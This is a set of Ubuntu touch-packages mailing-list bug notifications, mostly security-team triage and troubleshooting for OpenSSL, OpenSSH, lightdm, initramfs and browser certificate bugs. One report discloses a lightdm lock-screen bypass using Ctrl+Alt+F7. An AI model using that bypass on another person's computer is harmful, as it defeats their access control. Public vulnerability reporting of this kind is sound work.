[Touch-packages] [Bug 1973344] Re: Converting PKCS#8 into PKCS#1 fails with openssl 3.0

2022-05-13 Thread Seth Arnold
** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1973344

Title:
  Converting PKCS#8 into PKCS#1 fails with openssl 3.0

Status in openssl package in Ubuntu:
  New

Bug description:
  On Ubuntu jammy
  with OpenSSL 3.0.2:

  $ openssl rsa -in rsakey.pkcs8 -out rsakey.pkcs1
  writing RSA key

  $ grep -- "-BEGIN" rsakey.pkcs1
  -BEGIN PRIVATE KEY-

  With OpenSSL 1.1.1o or 1.1.1l
  $ openssl rsa -in rsakey.pkcs8 -out rsakey.pkcs1
  writing RSA key

  $ grep -- "-BEGIN" rsakey.pkcs1
  -BEGIN RSA PRIVATE KEY-

  Unfortunately, we still need to be able to generate PKCS #1 private
  keys as mysqld (8.0.29-0ubuntu0.22.04.2) despite using libssl3 is
  still not capable of loading PKCS #8 private keys.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1973344/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1972884] Re: Err:10 https://ppa.launchpadcontent.net/flatpak/stable/ubuntu jammy Release 404 Not Found [IP: 91.189.95.85 443]

2022-05-10 Thread Seth Arnold
Thanks for taking the time to report this bug and helping to make Ubuntu
better. We appreciate the difficulties you are facing, but this appears
to be a "regular" (non-security) bug.  I have unmarked it as a security
issue since this bug does not show evidence of allowing attackers to
cross privilege boundaries nor directly cause loss of data/privacy.
Please feel free to report any other bugs you may find.

** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to software-properties in
Ubuntu.
https://bugs.launchpad.net/bugs/1972884

Title:
  Err:10 https://ppa.launchpadcontent.net/flatpak/stable/ubuntu jammy
  Release   404  Not Found [IP: 91.189.95.85 443]

Status in software-properties package in Ubuntu:
  New

Bug description:
  Err:10 https://ppa.launchpadcontent.net/flatpak/stable/ubuntu jammy Release
404  Not Found [IP: 91.189.95.85 443]

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/software-properties/+bug/1972884/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1971888] Re: Can not ssh to github.com or gitlab.com when upgrading to 22.04

2022-05-10 Thread Seth Arnold
Alvaro, thanks for reporting back! I'm glad it worked.

I don't know the full details of which QoS settings changed in which
releases, but this email suggests that there was active interest in
changing which exact values were used:
http://lists.mindrot.org/pipermail/openssh-unix-
dev/2018-April/036788.html

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1971888

Title:
  Can not ssh to github.com or gitlab.com when upgrading to 22.04

Status in openssh package in Ubuntu:
  Incomplete

Bug description:
  Dear all,

  After the upgrading to Ubuntu 22.04 I can not use git over ssh.

  The best way to reproduce the error is:

  ```
  acs@lsp-022:~$ ssh -vT g...@github.com
  OpenSSH_8.9p1 Ubuntu-3, OpenSSL 3.0.2 15 Mar 2022
  debug1: Reading configuration data /etc/ssh/ssh_config
  debug1: /etc/ssh/ssh_config line 19: include /etc/ssh/ssh_config.d/*.conf 
matched no files
  debug1: /etc/ssh/ssh_config line 21: Applying options for *
  debug1: Connecting to github.com [140.82.121.4] port 22.
  debug1: connect to address 140.82.121.4 port 22: Connection timed out
  ```

  Before the upgrading I can connect correctly with:

  ```
  ssh -vT g...@github.com
  OpenSSH_8.2p1 Ubuntu-4ubuntu0.4, OpenSSL 1.1.1f  31 Mar 2020
  debug1: Reading configuration data /etc/ssh/ssh_config
  debug1: /etc/ssh/ssh_config line 21: include /etc/ssh/ssh_config.d/*.conf 
matched no files
  debug1: /etc/ssh/ssh_config line 23: Applying options for *
  debug1: Connecting to github.com [140.82.121.4] port 22.
  debug1: Connection established
  ```

  The same issue is happening with gitlab.com.

  Probably it is related with the OpenSSL version.

  Cheers!

  -- Alvaro

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: ssh 1:8.9p1-3
  ProcVersionSignature: Ubuntu 5.15.0-27.28-generic 5.15.30
  Uname: Linux 5.15.0-27-generic x86_64
  ApportVersion: 2.20.11-0ubuntu82
  Architecture: amd64
  CasperMD5CheckResult: unknown
  CurrentDesktop: GNOME
  Date: Thu May  5 23:00:33 2022
  InstallationDate: Installed on 2021-03-08 (423 days ago)
  InstallationMedia: Ubuntu 20.04.2.0 LTS "Focal Fossa" - Release amd64 
(20210209.1)
  PackageArchitecture: all
  SourcePackage: openssh
  UpgradeStatus: Upgraded to jammy on 2022-05-05 (0 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1971888/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1971888] Re: Can not ssh to github.com or gitlab.com when upgrading to 22.04

2022-05-09 Thread Seth Arnold
Alvaro, I wonder if your network is dropping packets with unexpected IP
QoS flags? Look for 'IPQoS' in ssh_config(5) to see the defaults and
available choices. This would be influenced by ssh settings but still
operate at TCP level.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1971888

Title:
  Can not ssh to github.com or gitlab.com when upgrading to 22.04

Status in openssh package in Ubuntu:
  Incomplete

Bug description:
  Dear all,

  After the upgrading to Ubuntu 22.04 I can not use git over ssh.

  The best way to reproduce the error is:

  ```
  acs@lsp-022:~$ ssh -vT g...@github.com
  OpenSSH_8.9p1 Ubuntu-3, OpenSSL 3.0.2 15 Mar 2022
  debug1: Reading configuration data /etc/ssh/ssh_config
  debug1: /etc/ssh/ssh_config line 19: include /etc/ssh/ssh_config.d/*.conf 
matched no files
  debug1: /etc/ssh/ssh_config line 21: Applying options for *
  debug1: Connecting to github.com [140.82.121.4] port 22.
  debug1: connect to address 140.82.121.4 port 22: Connection timed out
  ```

  Before the upgrading I can connect correctly with:

  ```
  ssh -vT g...@github.com
  OpenSSH_8.2p1 Ubuntu-4ubuntu0.4, OpenSSL 1.1.1f  31 Mar 2020
  debug1: Reading configuration data /etc/ssh/ssh_config
  debug1: /etc/ssh/ssh_config line 21: include /etc/ssh/ssh_config.d/*.conf 
matched no files
  debug1: /etc/ssh/ssh_config line 23: Applying options for *
  debug1: Connecting to github.com [140.82.121.4] port 22.
  debug1: Connection established
  ```

  The same issue is happening with gitlab.com.

  Probably it is related with the OpenSSL version.

  Cheers!

  -- Alvaro

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: ssh 1:8.9p1-3
  ProcVersionSignature: Ubuntu 5.15.0-27.28-generic 5.15.30
  Uname: Linux 5.15.0-27-generic x86_64
  ApportVersion: 2.20.11-0ubuntu82
  Architecture: amd64
  CasperMD5CheckResult: unknown
  CurrentDesktop: GNOME
  Date: Thu May  5 23:00:33 2022
  InstallationDate: Installed on 2021-03-08 (423 days ago)
  InstallationMedia: Ubuntu 20.04.2.0 LTS "Focal Fossa" - Release amd64 
(20210209.1)
  PackageArchitecture: all
  SourcePackage: openssh
  UpgradeStatus: Upgraded to jammy on 2022-05-05 (0 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1971888/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1972114]

2022-05-09 Thread Seth Arnold
Thanks for taking the time to report this bug and helping to make Ubuntu
better. Since the package referred to in this bug is in universe or
multiverse, it is community maintained. If you are able, I suggest
coordinating with upstream and posting a debdiff for this issue. When a
debdiff is available, members of the security team will review it and
publish the package. See the following link for more information:
https://wiki.ubuntu.com/SecurityTeam/UpdateProcedures

** Tags added: community-security

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lightdm in Ubuntu.
https://bugs.launchpad.net/bugs/1972114

Title:
  Pressing Ctl Alt F7 allows me to bypass lock screen

Status in lightdm package in Ubuntu:
  New

Bug description:
  When I hid Ctl Alt f7 after locking the screen or starting the pc up
  from a suspended state it just takes me to my desktop without
  requiring a password.

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: lightdm 1.30.0-0ubuntu5
  ProcVersionSignature: Ubuntu 5.15.0-27.28-generic 5.15.30
  Uname: Linux 5.15.0-27-generic x86_64
  NonfreeKernelModules: nvidia_modeset nvidia
  ApportVersion: 2.20.11-0ubuntu82
  Architecture: amd64
  CasperMD5CheckResult: unknown
  CurrentDesktop: ubuntu:GNOME
  Date: Sun May  8 20:35:50 2022
  InstallationDate: Installed on 2022-03-12 (57 days ago)
  InstallationMedia: Ubuntu 20.04.4 LTS "Focal Fossa" - Release amd64 (20220223)
  SourcePackage: lightdm
  UpgradeStatus: Upgraded to jammy on 2022-04-29 (8 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1972114/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1608200] Re: please merge openssl from Debian

2022-05-09 Thread Seth Arnold
** Changed in: openssl (Ubuntu)
   Status: Incomplete => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1608200

Title:
  please merge openssl from Debian

Status in openssl package in Ubuntu:
  Fix Released

Bug description:
  I'm not aware of any ABI breakages, but I bumped the shlibs min
  version anyway.

  Please triple check
  + dh_makeshlibs -a -V "libssl1.0.0 (>= 1.0.2h)" 
--add-udeb="libcrypto1.0.0-udeb" -Xengines

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1608200/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1971221] Re: firefox is flashing

2022-05-06 Thread Seth Arnold
Thanks for taking the time to report this bug and helping to make Ubuntu
better. We appreciate the difficulties you are facing, but this appears
to be a "regular" (non-security) bug.  I have unmarked it as a security
issue since this bug does not show evidence of allowing attackers to
cross privilege boundaries nor directly cause loss of data/privacy.
Please feel free to report any other bugs you may find.

** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to xorg in Ubuntu.
https://bugs.launchpad.net/bugs/1971221

Title:
  firefox  is flashing

Status in xorg package in Ubuntu:
  New

Bug description:
  when  firefox window  behind other APP  windows,  it  is  flashing.

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: xorg 1:7.7+23ubuntu2
  ProcVersionSignature: Ubuntu 5.15.0-27.28-generic 5.15.30
  Uname: Linux 5.15.0-27-generic x86_64
  NonfreeKernelModules: nvidia_modeset nvidia
  .proc.driver.nvidia.capabilities.gpu0: Error: path was not a regular file.
  .proc.driver.nvidia.capabilities.mig: Error: path was not a regular file.
  .proc.driver.nvidia.gpus..01.00.0: Error: path was not a regular file.
  .proc.driver.nvidia.registry: Binary: ""
  .proc.driver.nvidia.suspend: suspend hibernate resume
  .proc.driver.nvidia.suspend_depth: default modeset uvm
  .proc.driver.nvidia.version:
   NVRM version: NVIDIA UNIX x86_64 Kernel Module  510.60.02  Wed Mar 16 
11:24:05 UTC 2022
   GCC version:
  ApportVersion: 2.20.11-0ubuntu82
  Architecture: amd64
  BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log'
  CasperMD5CheckResult: pass
  CompositorRunning: None
  CurrentDesktop: ubuntu:GNOME
  Date: Tue May  3 11:53:34 2022
  DistUpgraded: Fresh install
  DistroCodename: jammy
  DistroVariant: ubuntu
  GraphicsCard:
   NVIDIA Corporation GP104 [GeForce GTX 1080] [10de:1b80] (rev a1) (prog-if 00 
[VGA controller])
 Subsystem: Hewlett-Packard Company GP104 [GeForce GTX 1080] [103c:82fb]
  InstallationDate: Installed on 2022-05-01 (1 days ago)
  InstallationMedia: Ubuntu 22.04 LTS "Jammy Jellyfish" - Release amd64 
(20220419)
  MachineType: ASUS System Product Name
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.15.0-27-generic 
root=UUID=ff0f1b3b-e57d-46bf-817b-a2bf7bd47098 ro quiet splash vt.handoff=7
  SourcePackage: xorg
  Symptom: display
  UpgradeStatus: No upgrade log present (probably fresh install)
  dmi.bios.date: 04/01/2022
  dmi.bios.release: 14.4
  dmi.bios.vendor: American Megatrends Inc.
  dmi.bios.version: 1404
  dmi.board.asset.tag: Default string
  dmi.board.name: ROG STRIX Z690-A GAMING WIFI D4
  dmi.board.vendor: ASUSTeK COMPUTER INC.
  dmi.board.version: Rev 1.xx
  dmi.chassis.asset.tag: Default string
  dmi.chassis.type: 3
  dmi.chassis.vendor: Default string
  dmi.chassis.version: Default string
  dmi.modalias: 
dmi:bvnAmericanMegatrendsInc.:bvr1404:bd04/01/2022:br14.4:svnASUS:pnSystemProductName:pvrSystemVersion:rvnASUSTeKCOMPUTERINC.:rnROGSTRIXZ690-AGAMINGWIFID4:rvrRev1.xx:cvnDefaultstring:ct3:cvrDefaultstring:skuSKU:
  dmi.product.family: To be filled by O.E.M.
  dmi.product.name: System Product Name
  dmi.product.sku: SKU
  dmi.product.version: System Version
  dmi.sys.vendor: ASUS
  version.compiz: compiz N/A
  version.libdrm2: libdrm2 2.4.110-1ubuntu1
  version.libgl1-mesa-dri: libgl1-mesa-dri 22.0.1-1ubuntu2
  version.libgl1-mesa-glx: libgl1-mesa-glx N/A
  version.nvidia-graphics-drivers: nvidia-graphics-drivers-* N/A
  version.xserver-xorg-core: xserver-xorg-core 2:21.1.3-2ubuntu2
  version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A
  version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:19.1.0-2build3
  version.xserver-xorg-video-intel: xserver-xorg-video-intel 
2:2.99.917+git20210115-1
  version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 
1:1.0.17-2build1

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/1971221/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1971101] Re: package linux-image-5.13.0-40-generic 5.13.0-40.45~20.04.1 failed to install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1

2022-05-06 Thread Seth Arnold
Hello, note your filesystem is full:

Filesystem 1K-blocks Used Available Use% Mounted on
udev  9812920981292   0% /dev
tmpfs 202808 1508201300   1% /run
/dev/sda5   11167656 11000192 0 100% /

That causes errors like this:

cp: error writing '/var/tmp/mkinitramfs_jx7Z98//usr/bin/kmod': No space left on 
device
cp: error writing 
'/var/tmp/mkinitramfs_jx7Z98//usr/lib/x86_64-linux-gnu/liblzma.so.5.2.4': No 
space left on device
mkdir: cannot create directory ‘/var/tmp/mkinitramfs_jx7Z98/etc/modprobe.d’: No 
space left on device
mkdir: cannot create directory ‘/var/tmp/mkinitramfs_jx7Z98/lib/modprobe.d’: No 
space left on device
mkdir: cannot create directory ‘/var/tmp/mkinitramfs_jx7Z98//etc/modprobe.d’: 
No space left on device

These errors are preventing your system update from finishing.

Free up some space on the root filesystem, and then try:

sudo apt install -f
or
sudo dpkg --configure -a

The full screen issue may require talking with VirtualBox support.

Thanks

** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu.
https://bugs.launchpad.net/bugs/1971101

Title:
  package linux-image-5.13.0-40-generic 5.13.0-40.45~20.04.1 failed to
  install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools
  exited with return code 1

Status in initramfs-tools package in Ubuntu:
  New

Bug description:
  Slow system. I get notified all the time. Oh, by the way, I need help
  getting this virtual screen to go back full screen. Thanks!

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: linux-image-5.13.0-40-generic 5.13.0-40.45~20.04.1
  ProcVersionSignature: Ubuntu 5.11.0-41.45~20.04.1-generic 5.11.22
  Uname: Linux 5.11.0-41-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.21
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Sun May  1 01:38:42 2022
  ErrorMessage: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with 
return code 1
  InstallationDate: Installed on 2021-10-01 (212 days ago)
  InstallationMedia: Ubuntu 20.04.3 LTS "Focal Fossa" - Release amd64 (20210819)
  Python3Details: /usr/bin/python3.8, Python 3.8.10, python3-minimal, 
3.8.2-0ubuntu2
  PythonDetails: N/A
  RelatedPackageVersions:
   dpkg 1.19.7ubuntu3
   apt  2.0.6
  SourcePackage: initramfs-tools
  Title: package linux-image-5.13.0-40-generic 5.13.0-40.45~20.04.1 failed to 
install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with 
return code 1
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/initramfs-tools/+bug/1971101/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


Re: [Touch-packages] [Bug 1971888] [NEW] Can not ssh to github.com or gitlab.com when upgrading to 22.04

2022-05-05 Thread Seth Arnold
On Thu, May 05, 2022 at 09:09:07PM -, Alvaro wrote:
> acs@lsp-022:~$ ssh -vT g...@github.com
> ...
> debug1: connect to address 140.82.121.4 port 22: Connection timed out

Note that "Connection timed out" is an error at the TCP level, that
indicates that your computer wasn't able to establish a TCP session. ssh's
algorithm choices aren't involved yet.

Are you sure this machine can communicate with 140.82.121.4:22 at all?

$ nc 140.82.112.4 22
SSH-2.0-babeld-78a8149e
^C

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1971888

Title:
  Can not ssh to github.com or gitlab.com when upgrading to 22.04

Status in openssh package in Ubuntu:
  New

Bug description:
  Dear all,

  After the upgrading to Ubuntu 22.04 I can not use git over ssh.

  The best way to reproduce the error is:

  ```
  acs@lsp-022:~$ ssh -vT g...@github.com
  OpenSSH_8.9p1 Ubuntu-3, OpenSSL 3.0.2 15 Mar 2022
  debug1: Reading configuration data /etc/ssh/ssh_config
  debug1: /etc/ssh/ssh_config line 19: include /etc/ssh/ssh_config.d/*.conf 
matched no files
  debug1: /etc/ssh/ssh_config line 21: Applying options for *
  debug1: Connecting to github.com [140.82.121.4] port 22.
  debug1: connect to address 140.82.121.4 port 22: Connection timed out
  ```

  Before the upgrading I can connect correctly with:

  ```
  ssh -vT g...@github.com
  OpenSSH_8.2p1 Ubuntu-4ubuntu0.4, OpenSSL 1.1.1f  31 Mar 2020
  debug1: Reading configuration data /etc/ssh/ssh_config
  debug1: /etc/ssh/ssh_config line 21: include /etc/ssh/ssh_config.d/*.conf 
matched no files
  debug1: /etc/ssh/ssh_config line 23: Applying options for *
  debug1: Connecting to github.com [140.82.121.4] port 22.
  debug1: Connection established
  ```

  The same issue is happening with gitlab.com.

  Probably it is related with the OpenSSL version.

  Cheers!

  -- Alvaro

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: ssh 1:8.9p1-3
  ProcVersionSignature: Ubuntu 5.15.0-27.28-generic 5.15.30
  Uname: Linux 5.15.0-27-generic x86_64
  ApportVersion: 2.20.11-0ubuntu82
  Architecture: amd64
  CasperMD5CheckResult: unknown
  CurrentDesktop: GNOME
  Date: Thu May  5 23:00:33 2022
  InstallationDate: Installed on 2021-03-08 (423 days ago)
  InstallationMedia: Ubuntu 20.04.2.0 LTS "Focal Fossa" - Release amd64 
(20210209.1)
  PackageArchitecture: all
  SourcePackage: openssh
  UpgradeStatus: Upgraded to jammy on 2022-05-05 (0 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1971888/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1971650] Re: wrong check for "server" in libssl3.postinst

2022-05-05 Thread Seth Arnold
Possibly related to https://bugs.launchpad.net/bugs/1832421

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1971650

Title:
  wrong check for "server" in libssl3.postinst

Status in openssl package in Ubuntu:
  New

Bug description:
  A security update has just been applied to my system for openssl, and
  the 'reboot required' message just popped on my desktop.  I looked to
  see why this was, and found the following code in the libssl3
  postinst:

  # Here we issue the reboot notification for upgrades and
  # security updates. We do want services to be restarted when we
  # update for a security issue, but planned by the sysadmin, not
  # automatically.

  # Only issue the reboot notification for servers; we proxy this by
  # testing that the X server is not running (LP: #244250)
  if ! pidof /usr/lib/xorg/Xorg > /dev/null && [ -x 
/usr/share/update-notifier/notify-reboot-required ]; then
  /usr/share/update-notifier/notify-reboot-required
  fi

  Now, AFAIK this is the only package that interfaces with notify-
  reboot-required but omits the notification on desktops, so that seems
  to be an inconsistent policy; but even if we thought that was the
  correct policy to apply, the above check for a desktop is not because
  it doesn't match in the case the user is running Xwayland, which most
  users not using the nvidia driver will be doing now by default.

  Also, this is now inside a block that checks for the presence of
  needrestart, which is part of the server seed; so in effect this
  notification now *never* fires on servers, it *only* fires on
  desktops.

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: openssl 3.0.2-0ubuntu1.1
  ProcVersionSignature: Ubuntu 5.15.0-27.28-generic 5.15.30
  Uname: Linux 5.15.0-27-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
  ApportVersion: 2.20.11-0ubuntu82
  Architecture: amd64
  CasperMD5CheckResult: unknown
  CurrentDesktop: ubuntu:GNOME
  Date: Thu May  5 05:39:06 2022
  InstallationDate: Installed on 2019-12-23 (863 days ago)
  InstallationMedia: Ubuntu 19.10 "Eoan Ermine" - Release amd64 (20191017)
  RebootRequiredPkgs: Error: path contained symlinks.
  SourcePackage: openssl
  UpgradeStatus: Upgraded to jammy on 2022-04-15 (19 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1971650/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1963834] Re: openssl 3.0 - SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED]

2022-04-26 Thread Seth Arnold
Yes, managing the configurations for the huge variety of cryptography
toolkits on a Linux system is definitely something of a chore. It would
be nice to give people one command they could use to return to unsafe-
but-compatible cryptography -- or enforce only modern cryptography.

Our friends at Red Hat have prepared https://gitlab.com/redhat-
crypto/fedora-crypto-policies -- while a version of this is packaged:
https://launchpad.net/ubuntu/+source/crypto-policies -- I don't believe
it actually works on Ubuntu:
https://bugs.launchpad.net/ubuntu/+source/crypto-policies/+bug/1926664

Maybe someday.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1963834

Title:
  openssl 3.0 - SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED]

Status in openssl package in Ubuntu:
  Won't Fix

Bug description:
  Description:Ubuntu Jammy Jellyfish (development branch)
  Release:22.04

  openssl:
Installé : 3.0.1-0ubuntu1
Candidat : 3.0.1-0ubuntu1
   Table de version :
   *** 3.0.1-0ubuntu1 500
  500 http://ca.archive.ubuntu.com/ubuntu jammy/main amd64 Packages
  100 /var/lib/dpkg/status

  Using Ubuntu 22.04, I now get the following error message when
  attempting to connect to our office VPN using "gp-saml-gui
  (https://github.com/dlenski/gp-saml-gui)" :

  #
  dominique@Doombuntu:~$ .local/bin/gp-saml-gui  server_url
  Looking for SAML auth tags in response to 
https://server_url/global-protect/prelogin.esp...
  usage: gp-saml-gui [-h] [--no-verify] [-C COOKIES | -K] [-g | -p] [-c CERT] 
[--key KEY] [-v | -q] [-x | -P | -S] [-u] [--clientos {Windows,Linux,Mac}] [-f 
EXTRA] server [openconnect_extra ...]
  gp-saml-gui: error: SSL error: [SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] 
unsafe legacy renegotiation disabled (_ssl.c:997)
  #
  #
  #

  gp-saml-gui uses python module requests.
  Using python ide, I can get the same results  :

  #
  >>> r = requests.get('https://server_url')
  Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 699, 
in urlopen
  httplib_response = self._make_request(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 382, 
in _make_request
  self._validate_conn(conn)
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 1012, 
in _validate_conn
  conn.connect()
File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 411, in 
connect
  self.sock = ssl_wrap_socket(
File "/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 449, in 
ssl_wrap_socket
  ssl_sock = _ssl_wrap_socket_impl(
File "/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 493, in 
_ssl_wrap_socket_impl
  return ssl_context.wrap_socket(sock, server_hostname=server_hostname)
File "/usr/lib/python3.10/ssl.py", line 512, in wrap_socket
  return self.sslsocket_class._create(
File "/usr/lib/python3.10/ssl.py", line 1070, in _create
  self.do_handshake()
File "/usr/lib/python3.10/ssl.py", line 1341, in do_handshake
  self._sslobj.do_handshake()
  ssl.SSLError: [SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy 
renegotiation disabled (_ssl.c:997)

  During handling of the above exception, another exception occurred:

  Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/requests/adapters.py", line 439, in 
send
  resp = conn.urlopen(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 755, 
in urlopen
  retries = retries.increment(
File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 574, in 
increment
  raise MaxRetryError(_pool, url, error or ResponseError(cause))
  urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='server_url', 
port=443): Max retries exceeded with url: / (Caused by SSLError(SSLError(1, 
'[SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation 
disabled (_ssl.c:997)')))

  During handling of the above exception, another exception occurred:

  Traceback (most recent call last):
File "", line 1, in 
File "/usr/lib/python3/dist-packages/requests/api.py", line 76, in get
  return request('get', url, params=params, **kwargs)
File "/usr/lib/python3/dist-packages/requests/api.py", line 61, in request
  return session.request(method=method, url=url, **kwargs)
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 542, in 
request
  resp = self.send(prep, **send_kwargs)
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 655, in 
send
  r = adapter.send(request, **kwargs)
File "/usr/lib/python3/dist-packages/requests/adapters.py", line 514, in 
send
  raise SSLError(e, request=request)
  requests.exceptions.SSLError: HTTPSConnectionPool(host='server_url', 
port=443): Max retries 

[Touch-packages] [Bug 1970459] Re: import of ca-certificate in browser does not work

2022-04-26 Thread Seth Arnold
I switched this from ca-certificates to firefox and chromium-browser,
since both browsers manage their own certificate lists and don't use the
system-provided ca-certificates. (You manage that with different tools,
see the first few lines of /etc/ca-certificates.conf for details.)

Thanks

** Package changed: ca-certificates (Ubuntu) => firefox (Ubuntu)

** Also affects: chromium-browser (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ca-certificates in Ubuntu.
https://bugs.launchpad.net/bugs/1970459

Title:
  import of ca-certificate in browser does not work

Status in chromium-browser package in Ubuntu:
  New
Status in firefox package in Ubuntu:
  New

Bug description:
  I tried to import a CA root certificate into both Firefox and Chrome.
  In Firefox, the import button just didn't do anything, in Chrome
  pressing "import" hangs up the browser. This means I can't reach the
  intranet of the company I work for.

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: ca-certificates 20211016
  ProcVersionSignature: Ubuntu 5.15.0-27.28-generic 5.15.30
  Uname: Linux 5.15.0-27-generic x86_64
  NonfreeKernelModules: nvidia_modeset nvidia
  ApportVersion: 2.20.11-0ubuntu82
  Architecture: amd64
  CasperMD5CheckResult: pass
  CurrentDesktop: ubuntu:GNOME
  Date: Tue Apr 26 19:16:12 2022
  InstallationDate: Installed on 2022-04-23 (3 days ago)
  InstallationMedia: Ubuntu 22.04 LTS "Jammy Jellyfish" - Release amd64 
(20220419)
  PackageArchitecture: all
  SourcePackage: ca-certificates
  UpgradeStatus: No upgrade log present (probably fresh install)

